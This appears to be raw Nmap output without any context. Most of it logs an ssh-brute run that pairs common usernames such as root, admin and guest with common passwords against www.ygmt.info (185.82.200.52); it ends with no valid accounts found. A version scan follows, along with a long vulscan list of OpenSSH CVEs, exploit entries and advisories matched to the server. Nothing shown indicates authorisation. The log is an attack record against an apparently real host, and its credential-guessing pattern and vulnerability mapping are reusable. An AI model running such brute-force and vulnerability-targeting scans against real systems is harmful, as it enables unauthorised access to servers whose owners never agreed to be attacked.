2129NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
2130NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
2131NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
2132NSE: [ssh-brute] Trying username/password pair: guest:ashley
2133NSE: [ssh-brute] Trying username/password pair: user:ashley
2134NSE: [ssh-brute] Trying username/password pair: web:ashley
2135NSE: [ssh-brute] Trying username/password pair: test:ashley
2136NSE: [ssh-brute] Trying username/password pair: root:000000
2137NSE: [ssh-brute] Trying username/password pair: admin:000000
2138NSE: [ssh-brute] Trying username/password pair: administrator:000000
2139NSE: [ssh-brute] Trying username/password pair: webadmin:000000
2140NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
2141NSE: [ssh-brute] Trying username/password pair: netadmin:000000
2142NSE: [ssh-brute] Trying username/password pair: guest:000000
2143NSE: [ssh-brute] Trying username/password pair: user:000000
2144NSE: [ssh-brute] Trying username/password pair: web:000000
2145NSE: [ssh-brute] Trying username/password pair: test:000000
2146NSE: [ssh-brute] Trying username/password pair: root:iloveu
2147NSE: [ssh-brute] Trying username/password pair: admin:iloveu
2148NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
2149NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
2150NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
2151NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
2152NSE: [ssh-brute] Trying username/password pair: guest:iloveu
2153NSE: [ssh-brute] Trying username/password pair: user:iloveu
2154NSE: [ssh-brute] Trying username/password pair: web:iloveu
2155NSE: [ssh-brute] Trying username/password pair: test:iloveu
2156NSE: [ssh-brute] Trying username/password pair: root:michelle
2157NSE: [ssh-brute] Trying username/password pair: admin:michelle
2158NSE: [ssh-brute] Trying username/password pair: administrator:michelle
2159NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
2160NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
2161NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
2162NSE: [ssh-brute] Trying username/password pair: guest:michelle
2163NSE: [ssh-brute] Trying username/password pair: user:michelle
2164NSE: [ssh-brute] Trying username/password pair: web:michelle
2165NSE: [ssh-brute] Trying username/password pair: test:michelle
2166NSE: [ssh-brute] Trying username/password pair: root:tigger
2167NSE: [ssh-brute] Trying username/password pair: admin:tigger
2168NSE: [ssh-brute] Trying username/password pair: administrator:tigger
2169NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
2170NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
2171NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
2172NSE: [ssh-brute] Trying username/password pair: guest:tigger
2173NSE: [ssh-brute] Trying username/password pair: user:tigger
2174NSE: [ssh-brute] Trying username/password pair: web:tigger
2175NSE: [ssh-brute] Trying username/password pair: test:tigger
2176NSE: [ssh-brute] Trying username/password pair: root:sunshine
2177NSE: [ssh-brute] Trying username/password pair: admin:sunshine
2178NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
2179NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
2180NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
2181NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
2182NSE: [ssh-brute] Trying username/password pair: guest:sunshine
2183NSE: [ssh-brute] Trying username/password pair: user:sunshine
2184NSE: [ssh-brute] Trying username/password pair: web:sunshine
2185NSE: [ssh-brute] Trying username/password pair: test:sunshine
2186NSE: [ssh-brute] Trying username/password pair: root:chocolate
2187NSE: [ssh-brute] Trying username/password pair: admin:chocolate
2188NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
2189NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
2190NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
2191NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
2192NSE: [ssh-brute] Trying username/password pair: guest:chocolate
2193NSE: [ssh-brute] Trying username/password pair: user:chocolate
2194NSE: [ssh-brute] Trying username/password pair: web:chocolate
2195NSE: [ssh-brute] Trying username/password pair: test:chocolate
2196NSE: [ssh-brute] Trying username/password pair: root:password1
2197NSE: [ssh-brute] Trying username/password pair: admin:password1
2198NSE: [ssh-brute] Trying username/password pair: administrator:password1
2199NSE: [ssh-brute] Trying username/password pair: webadmin:password1
2200NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
2201NSE: [ssh-brute] Trying username/password pair: netadmin:password1
2202NSE: [ssh-brute] Trying username/password pair: guest:password1
2203NSE: [ssh-brute] Trying username/password pair: user:password1
2204NSE: [ssh-brute] Trying username/password pair: web:password1
2205NSE: [ssh-brute] Trying username/password pair: test:password1
2206NSE: [ssh-brute] Trying username/password pair: root:soccer
2207NSE: [ssh-brute] Trying username/password pair: admin:soccer
2208NSE: [ssh-brute] Trying username/password pair: administrator:soccer
2209NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
2210NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
2211NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
2212NSE: [ssh-brute] Trying username/password pair: guest:soccer
2213NSE: [ssh-brute] Trying username/password pair: user:soccer
2214NSE: [ssh-brute] Trying username/password pair: web:soccer
2215NSE: [ssh-brute] Trying username/password pair: test:soccer
2216NSE: [ssh-brute] Trying username/password pair: root:anthony
2217NSE: [ssh-brute] Trying username/password pair: admin:anthony
2218NSE: [ssh-brute] Trying username/password pair: administrator:anthony
2219NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
2220NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
2221NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
2222NSE: [ssh-brute] Trying username/password pair: guest:anthony
2223NSE: [ssh-brute] Trying username/password pair: user:anthony
2224NSE: [ssh-brute] Trying username/password pair: web:anthony
2225NSE: [ssh-brute] Trying username/password pair: test:anthony
2226NSE: [ssh-brute] Trying username/password pair: root:friends
2227NSE: [ssh-brute] Trying username/password pair: admin:friends
2228NSE: [ssh-brute] Trying username/password pair: administrator:friends
2229NSE: [ssh-brute] Trying username/password pair: webadmin:friends
2230NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
2231NSE: [ssh-brute] Trying username/password pair: netadmin:friends
2232NSE: [ssh-brute] Trying username/password pair: guest:friends
2233NSE: [ssh-brute] Trying username/password pair: user:friends
2234NSE: [ssh-brute] Trying username/password pair: web:friends
2235NSE: [ssh-brute] Trying username/password pair: test:friends
2236NSE: [ssh-brute] Trying username/password pair: root:purple
2237NSE: [ssh-brute] Trying username/password pair: admin:purple
2238NSE: [ssh-brute] Trying username/password pair: administrator:purple
2239NSE: [ssh-brute] Trying username/password pair: webadmin:purple
2240NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
2241NSE: [ssh-brute] Trying username/password pair: netadmin:purple
2242NSE: [ssh-brute] Trying username/password pair: guest:purple
2243NSE: [ssh-brute] Trying username/password pair: user:purple
2244NSE: [ssh-brute] Trying username/password pair: web:purple
2245NSE: [ssh-brute] Trying username/password pair: test:purple
2246NSE: [ssh-brute] Trying username/password pair: root:angel
2247NSE: [ssh-brute] Trying username/password pair: admin:angel
2248NSE: [ssh-brute] Trying username/password pair: administrator:angel
2249NSE: [ssh-brute] Trying username/password pair: webadmin:angel
2250NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
2251NSE: [ssh-brute] Trying username/password pair: netadmin:angel
2252NSE: [ssh-brute] Trying username/password pair: guest:angel
2253NSE: [ssh-brute] Trying username/password pair: user:angel
2254NSE: [ssh-brute] Trying username/password pair: web:angel
2255NSE: [ssh-brute] Trying username/password pair: test:angel
2256NSE: [ssh-brute] Trying username/password pair: root:butterfly
2257NSE: [ssh-brute] Trying username/password pair: admin:butterfly
2258NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
2259NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
2260NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
2261NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
2262NSE: [ssh-brute] Trying username/password pair: guest:butterfly
2263NSE: [ssh-brute] Trying username/password pair: user:butterfly
2264NSE: [ssh-brute] Trying username/password pair: web:butterfly
2265NSE: [ssh-brute] Trying username/password pair: test:butterfly
2266NSE: [ssh-brute] Trying username/password pair: root:jordan
2267NSE: [ssh-brute] Trying username/password pair: admin:jordan
2268NSE: [ssh-brute] Trying username/password pair: administrator:jordan
2269NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
2270NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
2271NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
2272NSE: [ssh-brute] Trying username/password pair: guest:jordan
2273NSE: [ssh-brute] Trying username/password pair: user:jordan
2274NSE: [ssh-brute] Trying username/password pair: web:jordan
2275NSE: [ssh-brute] Trying username/password pair: test:jordan
2276NSE: [ssh-brute] Trying username/password pair: root:fuckyou
2277NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
2278NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
2279NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
2280NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
2281NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
2282NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
2283NSE: [ssh-brute] Trying username/password pair: user:fuckyou
2284NSE: [ssh-brute] Trying username/password pair: web:fuckyou
2285NSE: [ssh-brute] Trying username/password pair: test:fuckyou
2286NSE: [ssh-brute] Trying username/password pair: root:123123
2287NSE: [ssh-brute] Trying username/password pair: admin:123123
2288NSE: [ssh-brute] Trying username/password pair: administrator:123123
2289NSE: [ssh-brute] Trying username/password pair: webadmin:123123
2290NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
2291NSE: [ssh-brute] Trying username/password pair: netadmin:123123
2292NSE: [ssh-brute] Trying username/password pair: guest:123123
2293NSE: [ssh-brute] Trying username/password pair: user:123123
2294NSE: [ssh-brute] Trying username/password pair: web:123123
2295NSE: [ssh-brute] Trying username/password pair: test:123123
2296NSE: [ssh-brute] Trying username/password pair: root:justin
2297NSE: [ssh-brute] Trying username/password pair: admin:justin
2298NSE: [ssh-brute] Trying username/password pair: administrator:justin
2299NSE: [ssh-brute] Trying username/password pair: webadmin:justin
2300NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
2301NSE: [ssh-brute] Trying username/password pair: netadmin:justin
2302NSE: [ssh-brute] Trying username/password pair: guest:justin
2303NSE: [ssh-brute] Trying username/password pair: user:justin
2304NSE: [ssh-brute] Trying username/password pair: web:justin
2305NSE: [ssh-brute] Trying username/password pair: test:justin
2306NSE: [ssh-brute] Trying username/password pair: root:liverpool
2307NSE: [ssh-brute] Trying username/password pair: admin:liverpool
2308NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
2309NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
2310NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
2311NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
2312NSE: [ssh-brute] Trying username/password pair: guest:liverpool
2313NSE: [ssh-brute] Trying username/password pair: user:liverpool
2314NSE: [ssh-brute] Trying username/password pair: web:liverpool
2315NSE: [ssh-brute] Trying username/password pair: test:liverpool
2316NSE: [ssh-brute] Trying username/password pair: root:football
2317NSE: [ssh-brute] Trying username/password pair: admin:football
2318NSE: [ssh-brute] Trying username/password pair: administrator:football
2319NSE: [ssh-brute] Trying username/password pair: webadmin:football
2320NSE: [ssh-brute] Trying username/password pair: sysadmin:football
2321NSE: [ssh-brute] Trying username/password pair: netadmin:football
2322NSE: [ssh-brute] Trying username/password pair: guest:football
2323NSE: [ssh-brute] Trying username/password pair: user:football
NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
NSE: [ssh-brute] usernames: Time limit 3m00s exceeded.
NSE: [ssh-brute] passwords: Time limit 3m00s exceeded.
Nmap scan report for www.ygmt.info (185.82.200.52)
Host is up (0.10s latency).
rDNS record for 185.82.200.52: latina.petite.guru

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 408 guesses in 181 seconds, average tps: 2.6
| ssh-hostkey:
| 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
| 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
| 256 99:cb:fc:6d:e6:51:0d:46:73:06:0e:65:20:8c:c3:d0 (ECDSA)
|_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
| ssh-publickey-acceptance:
|_ Accepted Public Keys: No public keys accepted
|_ssh-run: Failed to specify credentials and command to run.
| vulscan: VulDB - https://vuldb.com:
| [76870] OpenSSH up to 6.9 auth2-chall.c kbdint_next_device privilege escalation
| [76326] OpenSSH 6.8 XSECURITY privilege escalation
| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate weak authentication
| [12683] OpenBSD OpenSSH up to 6.5 Configuration child_set_env Wildcard privilege escalation
| [12124] OpenSSH 6.4 J-PAKE Protocol schnorr.c hash_buffer denial of service
| [11124] OpenSSH 6.2/6.3 Post Authentication sshd process initialize mm_newkeys_from_blob privilege escalation
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.
| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function in the OpenSSH codebase, which allows local users to obtain sensitive information from process memory or possibly gain privileges via crafted use of an application that relies on this module, as demonstrated by su and sudo.
| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections.
| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
| [CVE-2004-2414] Novell NetWare 6.5 SP 1.1, when installing or upgrading using the Overlay CDs and performing a custom installation with OpenSSH, includes sensitive password information in the (1) NIOUTPUT.TXT and (2) NI.LOG log files, which might allow local users to obtain the passwords.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
| [75990] OpenSSH Login Handling Security Bypass Weakness
| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
| [61286] OpenSSH Remote Denial of Service Vulnerability
| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
| [30794] Red Hat OpenSSH Backdoor Vulnerability
| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
| [28531] OpenSSH ForceCommand Command Execution Weakness
| [28444] OpenSSH X Connections Session Hijacking Vulnerability
| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
| [20956] OpenSSH Privilege Separation Key Signature Weakness
| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
| [6168] OpenSSH Visible Password Vulnerability
| [5374] OpenSSH Trojan Horse Vulnerability
| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
| [4241] OpenSSH Channel Code Off-By-One Vulnerability
| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
| [2917] OpenSSH PAM Session Evasion Vulnerability
| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
| [2356] OpenSSH Private Key Authentication Check Vulnerability
| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
| [1334] OpenSSH UseLogin Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [83258] GSI-OpenSSH auth-pam.c security bypass
| [82781] OpenSSH time limit denial of service
| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
| [72756] Debian openssh-server commands information disclosure
| [68339] OpenSSH pam_thread buffer overflow
| [67264] OpenSSH ssh-keysign unauthorized access
| [65910] OpenSSH remote_glob function denial of service
| [65163] OpenSSH certificate information disclosure
| [64387] OpenSSH J-PAKE security bypass
| [63337] Cisco Unified Videoconferencing OpenSSH weak security
| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
| [45202] OpenSSH signal handler denial of service
| [44747] RHEL OpenSSH backdoor
| [44280] OpenSSH PermitRootLogin information disclosure
| [44279] OpenSSH sshd weak security
| [44037] OpenSSH sshd SELinux role unauthorized access
| [43940] OpenSSH X11 forwarding information disclosure
| [41549] OpenSSH ForceCommand directive security bypass
| [41438] OpenSSH sshd session hijacking
| [40897] OpenSSH known_hosts weak security
| [40587] OpenSSH username weak security
| [37371] OpenSSH username data manipulation
| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
| [37112] RHSA update for OpenSSH signal handler race condition not installed
| [37107] RHSA update for OpenSSH identical block denial of service not installed
| [36637] OpenSSH X11 cookie privilege escalation
| [35167] OpenSSH packet.c newkeys[mode] denial of service
| [34490] OpenSSH OPIE information disclosure
| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
| [32975] Apple Mac OS X OpenSSH denial of service
| [32387] RHSA-2006:0738 updates for openssh not installed
| [32359] RHSA-2006:0697 updates for openssh not installed
| [32230] RHSA-2006:0298 updates for openssh not installed
| [32132] RHSA-2006:0044 updates for openssh not installed
| [30120] OpenSSH privilege separation monitor authentication verification weakness
| [29255] OpenSSH GSSAPI user enumeration
| [29254] OpenSSH signal handler race condition
| [29158] OpenSSH identical block denial of service
| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
| [25116] OpenSSH OpenPAM denial of service
| [24305] OpenSSH SCP shell expansion command execution
| [22665] RHSA-2005:106 updates for openssh not installed
| [22117] OpenSSH GSSAPI allows elevated privileges
| [22115] OpenSSH GatewayPorts security bypass
| [20930] OpenSSH sshd.c LoginGraceTime denial of service
| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
| [17213] OpenSSH allows port bouncing attacks
| [16323] OpenSSH scp file overwrite
| [13797] OpenSSH PAM information leak
| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
| [13264] OpenSSH PAM code could allow an attacker to gain access
| [13215] OpenSSH buffer management errors could allow an attacker to execute code
| [13214] OpenSSH memory vulnerabilities
| [13191] OpenSSH large packet buffer overflow
| [12196] OpenSSH could allow an attacker to bypass login restrictions
| [11970] OpenSSH could allow an attacker to obtain valid administrative account
| [11902] OpenSSH PAM support enabled information leak
| [9803] OpenSSH "
| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
| [9307] OpenSSH is running on the system
| [9169] OpenSSH "
| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
| [8383] OpenSSH off-by-one error in channel code
| [7647] OpenSSH UseLogin option arbitrary code execution
| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
| [7179] OpenSSH source IP access control bypass
| [6757] OpenSSH "
| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
| [5517] OpenSSH allows unauthorized access to resources
| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
|
| Exploit-DB - https://www.exploit-db.com:
| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
| [881183] CentOS Update for openssh CESA-2012:0884 centos6
| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
| [870763] RedHat Update for openssh RHSA-2012:0884-04
| [870129] RedHat Update for openssh RHSA-2008:0855-01
| [861813] Fedora Update for openssh FEDORA-2010-5429
| [861319] Fedora Update for openssh FEDORA-2007-395
| [861170] Fedora Update for openssh FEDORA-2007-394
| [861012] Fedora Update for openssh FEDORA-2007-715
| [840345] Ubuntu Update for openssh vulnerability USN-597-1
| [840300] Ubuntu Update for openssh update USN-612-5
| [840271] Ubuntu Update for openssh vulnerability USN-612-2
| [840268] Ubuntu Update for openssh update USN-612-7
| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
| [840214] Ubuntu Update for openssh vulnerability USN-566-1
| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
| [100584] OpenSSH X Connections Session Hijacking Vulnerability
| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
| [65987] SLES10: Security update for OpenSSH
| [65819] SLES10: Security update for OpenSSH
| [65514] SLES9: Security update for OpenSSH
| [65513] SLES9: Security update for OpenSSH
| [65334] SLES9: Security update for OpenSSH
| [65248] SLES9: Security update for OpenSSH
| [65218] SLES9: Security update for OpenSSH
| [65169] SLES9: Security update for openssh,openssh-askpass
| [65126] SLES9: Security update for OpenSSH
| [65019] SLES9: Security update for OpenSSH
| [65015] SLES9: Security update for OpenSSH
| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
| [61639] Debian Security Advisory DSA 1638-1 (openssh)
| [61030] Debian Security Advisory DSA 1576-2 (openssh)
| [61029] Debian Security Advisory DSA 1576-1 (openssh)
| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
| [60667] Slackware Advisory SSA:2008-095-01 openssh
| [59014] Slackware Advisory SSA:2007-255-01 openssh
| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
| [57492] Slackware Advisory SSA:2006-272-02 openssh
| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
| [57470] FreeBSD Ports: openssh
| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
| [56294] Slackware Advisory SSA:2006-045-06 openssh
| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
| [53788] Debian Security Advisory DSA 025-1 (openssh)
| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
| [11343] OpenSSH Client Unauthorized Remote Forwarding
| [10954] OpenSSH AFS/Kerberos ticket/token passing
| [10883] OpenSSH Channel Code Off by 1
| [10823] OpenSSH UseLogin Environment Variables
|
| SecurityTracker - https://www.securitytracker.com:
| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
